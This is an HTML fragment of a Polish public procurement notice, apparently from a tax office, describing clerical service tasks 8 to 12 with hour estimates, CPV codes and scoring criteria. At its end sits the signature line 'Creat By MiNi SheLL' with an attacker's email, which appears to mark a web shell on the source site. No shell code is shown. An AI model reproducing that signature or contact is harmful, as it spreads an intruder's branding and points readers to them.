<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie Nr 8/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 984 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> zadanie Nr 9/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 984 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie Nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 1776 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie Nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 1776 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie Nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 1776 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com